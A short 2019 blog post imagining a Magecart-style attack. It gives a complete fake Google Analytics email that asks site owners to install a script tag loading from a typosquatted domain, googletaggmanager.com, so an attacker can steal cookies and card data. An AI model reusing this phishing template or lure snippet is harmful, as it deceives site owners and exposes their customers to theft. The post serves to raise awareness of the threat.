Phishing for an Analytics Injection

November 30, 2019

The recent Magecart attacks on Macy's and other e-commerce sites has led to me to ponder new ways that an attacker could inject their code on a website. Here's one idea I came up with. Imagine receiving the following email:


from: analytics-noreply@google.com
to: your@email.com

Dear Google Analytics Customer,

We recently redesigned our infrastructure to provide new data retention 
controls that allow you to configure how long your user and event data
are stored by Google Analytics. Due to these changes, we require all 
Google Analytics customers to replace their Google Analytics tracking 
code with the following:

<script async src="https://www.googletaggmanager.com/gtag/js?id=UA-12345678-1">
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-12345678-1');
</script>

Please remember to make these changes before Decemeber 15, 2019 in order 
to retain access to your Google Analytics data.

Thanks,
The Google Analytics Team

When the user falls for this phishing attack and embeds this snippet into their website, the attacker will be be able to run their javascript (hosted on googletaggmanager.com) and steal cookies, credit cards, etc. I wonder what percentage of website owners would fall for this.